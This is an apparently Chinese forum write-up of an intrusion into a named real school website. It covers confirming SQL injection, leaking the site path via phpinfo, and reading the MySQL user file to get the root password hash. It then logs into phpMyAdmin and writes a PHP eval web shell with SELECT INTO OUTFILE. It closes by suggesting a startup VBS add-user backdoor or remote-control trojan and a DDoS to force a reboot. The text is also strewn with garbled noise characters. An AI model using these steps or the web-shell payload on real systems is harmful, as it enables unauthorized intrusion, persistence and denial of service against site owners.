第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏$ I: E2 l/ O8 U# V" v
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!" V, u9 t4 Z9 n N$ f! e
* h8 B& k( ~( L7 K. C/ w- l
4 I( U% U' j% U+ V3 a# M! F! t7 i8 Q6 g C; w! h
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 9 b+ e U! B Y& ?# u
: d* R' T) {+ `8 L. D0 K# \
那么想可以直接写入shell ,getshell有几个条件:
! A) N/ k; H7 D4 ?9 V' D! ^1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF ' K) G5 g% K, ]) g7 k9 C/ {% J& B# E
8 B! d6 c' T3 e: z: ^. H试着爆绝对路径: & ~+ t" h O# P3 W/ e
1./phpMyAdmin/index.php?lang[]=1
2 [/ r5 f% T3 F2./phpMyAdmin/phpinfo.php + }. ]1 c0 @' |' h+ Y
3./load_file() # g4 P6 R7 f4 L F6 N8 ^) d$ a
4./phpmyadmin/themes/darkblue_orange/layout.inc.php " g, y$ \: w8 n3 z) J
5./phpmyadmin/libraries/select_lang.lib.php , v* X- X; V+ k) J
6./phpmyadmin/libraries/lect_lang.lib.php - s+ e# v6 L {
7./phpmyadmin/libraries/mcrypt.lib.php
5 _" C/ E, l! F# n8./phpmyadmin/libraries/export/xls.php
8 e* P/ ?5 h8 U. p" h% Q8 d( h+ {* A& _# P. Q% {9 E
均不行...........................
' K: S0 ^8 S$ |+ u$ b7 O: f4 j! J# e( x( q, ^. U0 q: E
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
; z2 i* Y5 ?8 \4 l' S4 n/ w' v0 L8 a* o7 M
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin " R" g& A' M9 [
" X$ Q& R/ G! F默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
! n, V; a- |5 L, F4 D/ `7 b6 o/ ^/ R
敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
- |9 c; q E+ [. K5 \! E; J5 M1 R4 T" \
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell ( D2 y+ R% J% \# t3 E
8 |* D; j) C2 @, A) vhttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini M* R5 v$ x S9 B8 A: c
$ o) `9 H1 n% T. Y0 r% v
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 4 J. @; I8 u& S- f
6 C9 N' r3 c* k成功读到root密码:
- r; L1 z' M' D$ X5 r
& X; b( k2 m V! P5 ]! V17---- r(0072)
3 w1 L0 q3 I) E" n! B4 N/ h- }2 ~18---- o(006f) : Y3 ?) Y& X0 R6 [
19---- o(006f)
- N2 S j5 t; V: F# C# J7 e1 u20---- t(0074) 1 A Y" j5 M2 p, e1 B
21---- *(002a)
3 M* b: S: i6 l22---- 8(0038)
1 @' t" X3 j* Q* N23---- 2(0032)
3 E/ ^9 I/ T" L- w2 N) M" T3 G24---- E(0045)
' h: Y; `9 ?# g' x: Z3 \, }25---- 1(0031)
+ e( `0 L8 _8 Y$ v/ ]" `8 i5 k" t26---- C(0043) 8 A7 D2 @0 R+ Y# p
27---- 5(0035)
$ c6 C5 v c1 X0 }* y2 S28---- 8(0038)
, F- `2 s4 E# _) I* d _7 \29---- 2(0032)
$ v- z7 h o' l9 t( X r0 W# P30---- 8(0038) ' X3 P1 A" L5 s: w- j' Q" P
31---- A(0041)
4 r+ }. o' V2 I j( o32---- 9(0039) $ Z- k; w& O/ C0 v. `$ X
33---- B(0042)
; m) w0 b7 o$ d8 m34---- 5(0035)
5 K( [ d3 g1 b& m( B35---- 4(0034)
1 n/ E& J. i; o1 s4 @36---- 8(0038)
7 c; B9 M/ o& {8 ]: k& V+ X37---- 6(0036) & w7 o, U1 ?0 F$ @
38---- 4(0034)
1 e$ w/ Q' {- t39---- 9(0039)
, \9 a6 A0 N9 C40---- 1(0031)
" k( n0 \2 S& D0 E% y41---- 1(0031) / I' [- c3 k* i
42---- 5(0035)
. E9 X( u) `7 f0 V7 C43---- 3(0033) 6 K8 Y7 A# o2 v) ~5 S" e8 D
44---- 5(0035) ; K( b4 m) T- b0 t y- W
45---- 9(0039)
. p1 ?% I5 F- l0 H/ R, W46---- 8(0038) . I8 f! f' t' E$ f
47---- F(0046)
4 b9 h% d' c! O! i) _48---- F(0046) " A6 h5 y% ?: n" m
49---- 4(0034) : \/ F i/ K* {
50---- F(0046) . v( D. g1 f- m! C/ [
51---- 0(0030)
6 o2 f7 ?& h A. r; [' z52---- 3(0033)
$ {& b" ~/ v* d: N53---- 2(0032)
# ]; H1 n$ F+ e/ ~, c4 |: q54---- A(0041) 0 `# W( U: |6 h
55---- 4(0034) 3 o4 c& Y) l9 K! `, s. f
56---- A(0041)
% o% }9 }' B3 R57---- B(0042)
# O" O* R8 N& f. J) @- t' ?58---- *(0044) + Y$ b" h3 ~: _- T
59---- *(0035)
0 W1 S x( E6 C) K) E60---- *(0041) 1 o: i+ l/ f2 C: @
61---- *0032) 8 G W7 d8 m2 v" c0 {7 B! }
) [1 R; T1 F& L S) ?解密后成功登陆phpmyamin ! e) r5 ~" B/ o. }1 ^( I
" H- t1 o6 G/ ^) \6 P
. A* ^# L9 R" @
5 H) t- W' L9 h: J+ }' R
6 h* g$ ^% I! m8 U
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
7 ~) O7 ?: l9 d; ^& r0 R5 ^3 s' V$ W% Q0 s
成功执行,拿下shell,菜刀连接: - Q0 y' s) ]/ C y- b+ S; Y! c
7 V# S g# Z3 W
服务器不支持asp,aspx,php提权无果................... & X3 L5 S# w, g3 S' y; B
) y( p% c$ b! t3 |2 J/ I* e. D3 x# t但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: ) [2 M+ c& S0 B$ T
服务器上已经有个隐藏帐号了 $ P$ r( `# x1 J" n0 J! S
别名 administrators
$ D4 P, K7 c, R2 p注释 管理员对计算机/域有不受限制的完全访问权 4 [7 g. b3 K8 U- U, T5 W$ [3 h- F0 l
成员 4 |$ l1 @* z6 r6 B! O
-------------------------------------------------------------------------------
6 C& K' c( i9 z* Padmin1 [- G# a2 W1 M6 j) Z
Administrator P' a3 \1 ]& e P! P7 V! s* l
slipper$- b) C; Z+ r$ s+ i- N
sqluser
3 E3 ` g) s+ w+ L2 W: J命令成功完成。 H& x% m7 j0 ^2 {0 M
0 X5 _; z; a+ C2 w( l3 w4 a I. M5 a服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。3 G8 N+ x1 v& V! v3 l0 c
q& S8 f6 {1 ^# i0 u$ {
ddos服务器重启,不然就只能坐等服务器重启了...............................* \! Y" }% C7 f+ {' D7 s
& ?6 X# u7 e: R( m1 Q% @ $ D4 ?8 i) P2 i- }
|